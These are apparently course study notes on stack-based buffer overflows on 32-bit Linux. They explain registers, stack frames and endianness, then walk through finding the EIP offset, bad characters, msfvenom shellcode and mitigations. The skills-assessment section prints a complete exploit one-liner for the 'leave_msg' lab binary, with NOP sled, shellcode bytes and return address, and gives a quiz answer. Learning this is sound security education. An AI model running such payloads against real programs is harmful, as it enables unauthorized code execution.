💮Stack Based Buffer Overflow

Stack-Based Buffer Overflows on Linux x86

Contents

  • Introduction

    • Buffer Overflows Overview

    • Exploit Development Introduction

    • CPU Architecture

      • Memory

      • Central Processing Unit

        • RISC

        • CISC

      • Instruction Cycle

  • Fundamentals

    • Stack-Based Buffer Overflow

      • The Memory

      • Disable ASLR

      • Compile C code to a 32bit ELF binary

      • AT&T Syntax

        • Break down the info

      • Intel Syntax

      • Change GDB Syntax

      • Q: At which address in the "main" function is the "bowfunc" function gets called?

    • CPU Registers

      • Data registers

      • Pointer registers

    • Stack frames

    • Prologue

    • Epilogue

      • Index registers

    • Endianness

  • Exploit

    • Take Control of EIP

    • Determine the Length for Shellcode

      • Use in practice

    • Identification of Bad Characters

      • Breakpoints

      • Sending the characters

      • Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).

    • Generating Shellcode

      • MSFvenom Syntax

      • MSFvenom - Generate Shellcode

      • Shellcode

      • Exploit with shellcode

      • The Stack

    • Identification of the Return Address

      • GDB NOPS

      • Exploitation

  • Proof-Of-Concept

    • Public Exploit Modification

    • Prevention Techniques and Mechanisms

  • Skills Assessment

    • Skills Assessment - Buffer Overflow

  • Cheat Sheet

    • Check filetype

      • objdump

      • File

    • Open the file

    • Set syntax to Intel

    • Disassemble file

    • Determine offset with MSFvenom

    • Run file

    • Check EIP memory address

    • Find gdb offset with MSFvenom

    • Determine that you have found the offset

    • Determine length of shellcode

      • Shellcode calculation with NOPs

      • In gdb

    • Check bad characters

      • Characters

      • Notes

      • Find where we need to break a function

      • Make breakpoint

    • Send CHARS

      • Checking stack

    • Make shellcode

      • Shellcode

      • Notes

    • Run shellcode

      • Check stack

    • Find return address

      • Convert to little endian

      • Edit return address

    • Final exploit

Introduction

Buffer Overflows Overview

  • Less common nowadays due to memory protections in modern compilers

  • C and other languages are still prevalent in embedded systems and IoT

  • CVE-2021-3156: Recent heap-based buffer overflow in sudo

  • Web applications can also experience buffer overflows, such as CVE-2017-12542 with HP iLO devices

  • Incorrect program code can manipulate CPU processing, causing crashes, data corruption, or harm to data structures

  • Attackers can execute commands with vulnerable process privileges by overwriting return addresses with arbitrary data

  • Root access is a popular target, but buffer overflows leading to standard user privileges can still be dangerous

  • Von-Neumann architecture contributes to buffer overflow vulnerabilities

  • C and C++ languages do not automatically monitor memory buffer limits, leading to increased vulnerability

  • Java is less likely to experience buffer overflow conditions because its runtime manages memory through garbage collection and checks array bounds

Buffer overflows are caused by incorrect program code that fails to handle more data than a buffer can hold. The excess data overwrites adjacent memory, such as saved registers and return addresses, and can lead to code execution.

This happens when data is written to a reserved memory buffer or to the stack without a length limit. To prevent it, programs should enforce limits on how much data is written to their buffers.

Exploit Development Introduction

Exploit development takes place in the Exploitation Phase, after a specific software version has been identified as vulnerable.

Developing our own exploits

  • Very complex

  • Requires a deep understanding of CPU operations

  • Requires knowledge of the functions of the software that serves as our target

To write exploits we use Python.

The code or program that demonstrates an exploit is called a proof-of-concept (PoC).

Types of exploits

  • 0-day

    • Newly identified vulnerability

    • Not public

    • The developer is not yet aware of it

    • Persists through new updates until it is discovered and patched

  • N-day

    • Local

      • Executed when opening a file

        • PDF

        • Macro (.docx)

    • Remote

      • Get payload running on system

      • Executed over network

    • DoS

    • WebApp

CPU Architecture

Most CPUs are based on the Von-Neumann architecture

Four functional units

  1. Memory

  2. Control Unit

  3. Arithmetical Logical Unit

  4. Input/Output Unit

The most important units, the Arithmetical Logical Unit (ALU) and the Control Unit (CU), are combined in the Central Processing Unit (CPU).

ALU + CU = CPU

They are responsible for executing

  • Instructions

  • Flow control

Commands and data are fetched from memory

Bus system

  • Connection between

    • Processor

    • Memory

    • Input/output unit

All data is transferred via the bus system

Von-Neumann Architecture

image

Memory

  • Primary Memory

    • Cache

      • Buffer

      • Always fed with data and code

    • Random Access Memory (RAM)

      • Describes memory type

      • Memory addresses

  • Secondary Memory

    • External storage

      • HDD/SSD

      • Flash Drives

      • CD/DVD-ROMs

      • Not directly accessed by the CPU

        • Uses the I/O interface

    • Higher storage capacity

Control Unit

  • Reading data from the RAM

  • Saving data in RAM

  • Provide, decode and execute an instruction

  • Processing the inputs from peripheral devices

  • Processing of outputs to peripheral devices

  • Interrupt control

  • Monitoring of the entire system

The CU contains the Instruction Register (IR)

Central Processing Unit

Often called the Microprocessor

CPU architectures

  • x86/i386 - (AMD & Intel)

  • x86-64/amd64 - (AMD & Intel)

  • ARM - (Acorn)

RISC

Reduced Instruction Set Computer

Reduces the complexity of the instruction set for assembly

RISC processors are found in most smartphones

Fixed instruction length

  • 32-bit

  • 64-bit

CISC

Complex Instruction Set Computer

CISC instructions do not require a fixed 32-bit or 64-bit length. An instruction can be as short as 8 bits.

Instruction Cycle

Taken from the Academy:

| Instruction | Description |
| --- | --- |
| 1. FETCH | The next machine instruction address is read from the Instruction Address Register (IAR). It is then loaded from the Cache or RAM into the Instruction Register (IR). |
| 2. DECODE | The instruction decoder converts the instructions and starts the necessary circuits to execute the instruction. |
| 3. FETCH OPERANDS | If further data have to be loaded for execution, these are loaded from the cache or RAM into the working registers. |
| 4. EXECUTE | The instruction is executed. This can be, for example, operations in the ALU, a jump in the program, the writing back of results into the working registers, or the control of peripheral devices. Depending on the result of some instructions, the status register is set, which can be evaluated by subsequent instructions. |
| 5. UPDATE INSTRUCTION POINTER | If no jump instruction has been executed in the EXECUTE phase, the IAR is now increased by the length of the instruction so that it points to the next machine instruction. |
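
The five phases can be sketched as a toy interpreter. This is only an illustration: the instruction names (LOAD, ADD, JMP, HALT), the single `acc` register, and the tuple encoding are made up for this example and do not correspond to any real instruction set.

```python
# Toy machine: each instruction is an (opcode, operand) tuple.
# Real CPUs decode binary opcodes; the names here are hypothetical.
PROGRAM = [
    ("LOAD", 5),     # acc = 5
    ("ADD", 3),      # acc = acc + 3
    ("JMP", 4),      # jump over the next instruction
    ("ADD", 100),    # skipped because of the jump
    ("HALT", None),
]


def run(program):
    iar = 0  # Instruction Address Register: index of the next instruction
    acc = 0  # a single working register
    while True:
        ir = program[iar]        # 1. FETCH into the Instruction Register
        opcode, operand = ir     # 2. DECODE and 3. FETCH OPERANDS
        jumped = False
        if opcode == "LOAD":     # 4. EXECUTE
            acc = operand
        elif opcode == "ADD":
            acc += operand
        elif opcode == "JMP":
            iar = operand
            jumped = True
        elif opcode == "HALT":
            return acc
        else:
            raise ValueError(f"unknown opcode: {opcode}")
        if not jumped:           # 5. UPDATE INSTRUCTION POINTER
            iar += 1


print(run(PROGRAM))  # 8
```

The jump case is the part that matters for exploitation: whoever controls the value loaded into the instruction pointer decides what is executed next.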

Fundamentals

Stack-Based Buffer Overflow

Binary files

  • Portable Executable Format (PE)

    • Used on Microsoft Windows

  • Executable and Linking Format (ELF)

    • Used on UNIX-like systems

The Memory

image

.text

  • assembler instructions

.data

  • global and static variables

.bss

  • statically allocated variables represented exclusively by 0 bits (zero-initialized)

Heap

  • starts at the end of .bss and grows toward higher memory addresses

The Stack

  • Last-In-First-Out

  • Defined in RAM

  • Accessed via a stack pointer

Disable ASLR

Compile C code to a 32bit ELF binary

AT&T Syntax

Disassemble main

Break down the info

First column

  • Hexadecimal values that represent the memory addresses

| Memory Address | Address Jumps | Assembler Instruction | Operation Suffixes |
| --- | --- | --- | --- |
| 0x00000582 | <+0>: | lea | 0x4(%esp),%ecx |
| 0x00000586 | <+4>: | and | $0xfffffff0,%esp |
| ... | ... | ... | ... |

Intel Syntax

Change GDB Syntax

Q: At which address in the "main" function is the "bowfunc" function gets called?

Attack chain

Check filetype

Open up file in gdb

Set the syntax to Intel

Check out bowfunc

Screenshot:

Then we simply read the hexadecimal memory address of the instruction that calls bowfunc.

CPU Registers

Registers offer a small amount of storage space where data can be stored temporarily.

Types of registers

  • General registers

    • Data registers

    • Pointer registers

    • Index registers

  • Control registers

  • Segment registers

Data registers

| 32-bit Register | 64-bit Register | Description |
| --- | --- | --- |
| EAX | RAX | Accumulator is used in input/output and for arithmetic operations |
| EBX | RBX | Base is used in indexed addressing |
| ECX | RCX | Counter is used to rotate instructions and count loops |
| EDX | RDX | Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values |

Pointer registers

| 32-bit Register | 64-bit Register | Description |
| --- | --- | --- |
| EIP | RIP | Instruction Pointer stores the offset address of the next instruction to be executed |
| ESP | RSP | Stack Pointer points to the top of the stack |
| EBP | RBP | Base Pointer, also known as Stack Base Pointer or Frame Pointer, points to the base of the stack |

Stack Frames

  • The stack starts with a high address and grows down to low memory addresses.

  • The Base Pointer points to the beginning (base) of the stack and the Stack Pointer points to the top of the stack.

  • The stack is divided into regions called Stack Frames that allocate memory for functions as they are called.

  • A stack frame defines a frame of data with the beginning (EBP) and the end (ESP).

  • The stack memory is built on a Last-In-First-Out (LIFO) data structure.

Prologue

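This is called the Prologue. The previous EBP is saved on the stack, EBP is set to the current ESP, and ESP is then moved to make room at the top of the stack for the function's operations.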

Epilogue

In the epilogue, ESP is replaced by the current EBP, and EBP is reset to the value it had at the start of the function. The epilogue is short and can be done in different ways, but our example does it with only two instructions.
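
The prologue and epilogue can be traced with a small simulation. This is a sketch under stated assumptions: the class `ToyStack`, the starting address 0xFFFF0000, and the return address 0x08048123 are hypothetical values chosen for illustration, and the instruction names in the comments are the usual x86 equivalents of each step.

```python
class ToyStack:
    """Simulates a downward-growing stack of 4-byte slots (addresses are made up)."""

    def __init__(self, top=0xFFFF0000):
        self.mem = {}     # address -> stored value
        self.esp = top    # stack pointer
        self.ebp = top    # base pointer

    def push(self, value):
        self.esp -= 4             # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem.pop(self.esp)
        self.esp += 4
        return value

    def prologue(self, local_bytes):
        self.push(self.ebp)       # push ebp
        self.ebp = self.esp       # mov ebp, esp
        self.esp -= local_bytes   # sub esp, N (room for local variables)

    def epilogue(self):
        self.esp = self.ebp       # leave, part 1: mov esp, ebp
        self.ebp = self.pop()     # leave, part 2: pop ebp
        return self.pop()         # ret: pop the saved return address


stack = ToyStack()
caller_ebp = stack.ebp
stack.push(0x08048123)            # "call" pushes the return address (hypothetical)
stack.prologue(local_bytes=16)
print(hex(stack.ebp), hex(stack.esp))   # frame base and top while inside the function
print(hex(stack.epilogue()))            # the address execution returns to
```

The value returned by `epilogue()` is whatever sits in the saved return address slot. In a stack-based overflow, that slot is what the oversized input overwrites.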

Index registers

| Register 32-bit | Register 64-bit | Description |
| --- | --- | --- |
| ESI | RSI | Source Index is used as a pointer from a source for string operations |
| EDI | RDI | Destination Index is used as a pointer to a destination for string operations |

Endianness

During load and save operations in registers and memories, the bytes are read in a different order. This byte order is called endianness. Endianness is distinguished between the little-endian format and the big-endian format.

Big-endian and little-endian describe the order of significance. In big-endian, the most significant byte comes first. In little-endian, the least significant byte comes first. Mainframe processors, some RISC architectures, and minicomputers use the big-endian format, and the byte order in TCP/IP networks is also big-endian.

Now, let us look at an example with the following values:

  • Address: 0xffff0000

  • Word: \xAA\xBB\xCC\xDD

| Memory Address | 0xffff0000 | 0xffff0001 | 0xffff0002 | 0xffff0003 |
| --- | --- | --- | --- | --- |
| Big-Endian | AA | BB | CC | DD |
| Little-Endian | DD | CC | BB | AA |

This is very important for us to enter our code in the right order later when we have to tell the CPU to which address it should point.
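
The same example can be reproduced with Python's standard `struct` module, which is one convenient way to convert an address by hand. The snippet below is a minimal sketch that uses the word from the table above and the address 0xffffd64c that appears later in these notes.

```python
import struct

word = 0xAABBCCDD

big = struct.pack(">I", word)      # most significant byte first
little = struct.pack("<I", word)   # least significant byte first

print(big.hex())     # aabbccdd
print(little.hex())  # ddccbbaa

# On x86, an address placed in a payload is written in little-endian order.
address = struct.pack("<I", 0xFFFFD64C)
print(address.hex())  # 4cd6ffff
```

Here `"<I"` means a little-endian unsigned 32-bit integer and `">I"` the big-endian equivalent.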

Exploit

Take Control of EIP

We need to get the instruction pointer (EIP) under control, so we can tell it which address to jump to.

We then make it point to the address where our shellcode starts, so that the CPU executes it.

Segmentation Fault

Here we use Python to pass 1200 "U" characters (\x55) to our program as input. The resulting segmentation fault shows that we have indeed overwritten the EIP.

Determine the Length for Shellcode

Make shellcode with msfvenom

Now we can see that our payload is 68 bytes.

We place some no-operation instructions (NOPs) before the shellcode. They act as a landing zone: if execution jumps anywhere into the NOPs, it slides forward into the shellcode, so the return address does not have to be exact.

Shellcode - Length

How the buffer will look:

image
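
The arithmetic behind this layout can be sketched as follows. The offset of 1036 bytes and the 68-byte shellcode are taken from these notes. The NOP count of 100 is an assumption for illustration, and `buffer_layout` is a hypothetical helper, not part of any tool.

```python
def buffer_layout(total_len, nop_len, shellcode_len, ret_len=4):
    """Return the length of each part of the buffer, in the order it is sent."""
    padding_len = total_len - nop_len - shellcode_len - ret_len
    if padding_len < 0:
        raise ValueError("NOPs and shellcode do not fit in the buffer")
    return {
        "padding": padding_len,      # filler bytes such as \x55
        "nops": nop_len,             # \x90 landing zone
        "shellcode": shellcode_len,
        "return_address": ret_len,   # the 4 bytes that overwrite EIP
    }


# 1036 bytes up to EIP plus the 4 bytes of EIP itself.
layout = buffer_layout(total_len=1036 + 4, nop_len=100, shellcode_len=68)
print(layout)
```

The lengths always have to add up to the total, so making the shellcode or the NOP area larger means shrinking the padding by the same amount.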

Use in practice

Command:

In gdb:

Identification of Bad Characters

Bad characters:

  • \x00 - Null Byte

  • \x0A - Line Feed

  • \x0D - Carriage Return

  • \xFF - commonly listed as Form Feed (note that the ASCII Form Feed is actually \x0C)

To find it we can use this character list: CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

Using this list, we can look for bad characters by running the previous command again, with the character list as our payload.

Breakpoints

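To set a breakpoint at a function, we use break followed by the function name, for example break bowfunc. To break at a specific address, we use break *address.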

Sending the characters

To look at the stack:

We look for the point on the stack where the 0x55 padding ends and our characters begin.

Wherever a null byte (\x00) appears in place of a byte we sent, that byte is a bad character.
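
The comparison between what was sent and what arrived on the stack can also be done in code. This is a minimal sketch: `first_bad_char` and `chars_without` are hypothetical helpers, and the `observed` bytes are simulated here rather than read from a real memory dump.

```python
def first_bad_char(sent, observed):
    """Return the first sent byte that does not appear unchanged in memory, or None."""
    for index, byte in enumerate(sent):
        if index >= len(observed) or observed[index] != byte:
            return byte
    return None


def chars_without(bad):
    """All byte values 0x00-0xff except the known bad characters."""
    return bytes(b for b in range(256) if b not in bad)


bad = {0x00}
sent = chars_without(bad)

# Simulated stack contents: pretend the program replaced \x09 with a null byte.
observed = sent.replace(b"\x09", b"\x00")

print(hex(first_bad_char(sent, observed)))  # 0x9
```

In practice the process is repeated: add the byte that was found to `bad`, regenerate the list, send it again, and continue until the whole list arrives unchanged.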

Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).

\x00\x09\x0A\x20

Generating Shellcode

When generating shellcode, pay attention to these areas:

  • Architecture

  • Platform

  • Bad Characters

MSFvenom Syntax

MSFvenom - Generate Shellcode

Shellcode

Exploit with Shellcode

The Stack

Identification of the Return Address

GDB NOPS

This picture illustrates where the address 0xffffd64c is.

image

After selecting a memory address, we replace the "\x66" bytes that overwrite the EIP with that address, so that execution jumps to 0xffffd64c. Note that the address is entered in reverse byte order (little-endian): \x4c\xd6\xff\xff.

Exploitation

Proof-Of-Concept

Public Exploit Modification

Public exploits might not work in our case without changes. That is why we should learn how to edit and write exploits, so we can fine-tune them to our own use case.

Prevention Techniques and Mechanisms

Security mechanisms that help prevent this

  • Canaries

    • Known values written to the stack between buffer and control data, to detect buffer overflows

  • Address Space Layout Randomization (ASLR)

    • Randomizes the memory layout, which makes it difficult to find target addresses in memory

  • Data Execution Prevention (DEP)

    • Monitors that the program accesses memory areas cleanly, and stops code from being executed in data areas such as the stack
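
The idea behind a canary can be illustrated with a toy simulation. This is not how a compiler implements it. The frame layout, the 16-byte buffer, the 4-byte canary, and the function `call_with_canary` are assumptions made for this sketch.

```python
import secrets

BUF_SIZE = 16


def call_with_canary(user_input, canary=None):
    """Simulate a function call whose frame is [ buffer | canary | return address ]."""
    if canary is None:
        canary = secrets.token_bytes(4)   # random value chosen at runtime
    frame = bytearray(BUF_SIZE) + bytearray(canary) + bytearray(b"RETA")
    # Unchecked copy, similar to strcpy(): writes as many bytes as the input has.
    frame[0:len(user_input)] = user_input
    # Check performed just before the function would return.
    if bytes(frame[BUF_SIZE:BUF_SIZE + 4]) != canary:
        return "stack smashing detected"
    return "returned normally"


print(call_with_canary(b"A" * 16, canary=b"\xde\xad\xbe\xef"))  # returned normally
print(call_with_canary(b"A" * 24, canary=b"\xde\xad\xbe\xef"))  # stack smashing detected
```

An input that stays inside the buffer leaves the canary untouched. An input long enough to reach the return address has to pass through the canary first, which is what makes the overflow detectable.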

Skills Assessment

Skills Assessment - Buffer Overflow

Q: Determine the file type of "leave_msg" binary and submit it as the answer.

First we need to take control of the EIP.

To do this, we need to find the memory address where our padding characters end and the payload starts.

Attack chain:

image

End memory address is 0xffffd68a

Convert it to little endian

0xffffd68a -> \x8A\xD6\xFF\xFF

Now our final payload will be

We run the program outside gdb

gdb -q leave_msg

./leave_msg $(python -c 'print "\x55" * (2060 - 124 - 95 - 4) + "\x90" * 124 + "\xd9\xeb\xd9\x74\x24\xf4\x5d\x29\xc9\xb8\xfc\x4b\xe3\x50\xb1\x12\x31\x45\x17\x03\x45\x17\x83\x39\x4f\x01\xa5\xf0\x8b\x32\xa5\xa1\x68\xee\x40\x47\xe6\xf1\x25\x21\x35\x71\xd6\xf4\x75\x4d\x14\x86\x3f\xcb\x5f\xee\xc0\x2b\xa0\xef\x56\x2e\xa0\xfe\xfa\xa7\x41\xb0\x65\xe8\xd0\xe3\xda\x0b\x5a\xe2\xd0\x8c\x0e\x8c\x84\xa3\xdd\x24\x31\x93\x0e\xd6\xa8\x62\xb3\x44\x78\xfc\xd5\xd8\x75\x33\x95" + "\x8A\xD6\xFF\xFF"')

Cheat sheet

Check filetype

Objdump

File

or

Open the file

Set syntax to Intel

Disassemble file

Determine offset with MSFvenom

then cat the output

Run file

Check EIP memory address

EIP now displays a different memory address

Use this address to find the offset

Find gdb offset with MSFvenom

Use the offset that you found

The offset is 1036 in this case
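
How a unique pattern reveals the offset can be sketched in Python. This is an illustration of the idea only, not the tool used in these notes: `make_pattern` and `find_offset` are hypothetical helpers that build an "Aa0Aa1Aa2..." style pattern and look up the 4 bytes that ended up in EIP.

```python
import string
import struct


def make_pattern(length):
    """Build a pattern of upper/lower/digit triples in which every 4-byte window is unique."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if 3 * len(triples) >= length:
                    return "".join(triples)[:length].encode("ascii")
    raise ValueError("requested length exceeds the maximum pattern size")


def find_offset(eip_value, pattern):
    """Return the position of the 4 bytes found in EIP, or -1 if they are not in the pattern."""
    needle = struct.pack("<I", eip_value)   # EIP holds the bytes in little-endian order
    return pattern.find(needle)


pattern = make_pattern(1200)
print(pattern[:9])  # b'Aa0Aa1Aa2'

# Simulate a crash in which the 4 bytes at position 1036 landed in EIP.
eip = struct.unpack("<I", pattern[1036:1040])[0]
print(find_offset(eip, pattern))  # 1036
```

Because every 4-byte window in the pattern occurs only once, the value read from EIP after the crash identifies exactly one position in the input.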

Determine that you have found the offset

Determine length of shellcode

68 bytes

Shellcode calculation with NOPs

In gdb

Check bad characters

Characters

Notes

Find where we need to break a function

output

Make breakpoint

Send CHARS

output

Checking stack

Then find where the \x55 bytes end and check for every null byte (\x00)

Make shellcode

output

Shellcode

output

Notes

Run shellcode

output

Check stack

output

Find return address

Needs a breakpoint!

image

End memory address is 0xffffd68a

Convert to little endian

Link: Online Hex Converter - Bytes, Ints, Floats, Significance, Endians - SCADACore

0xffffd68a -> \x8A\xD6\xFF\xFF

Edit return address

old:

new:

Final exploit

This is run outside gdb
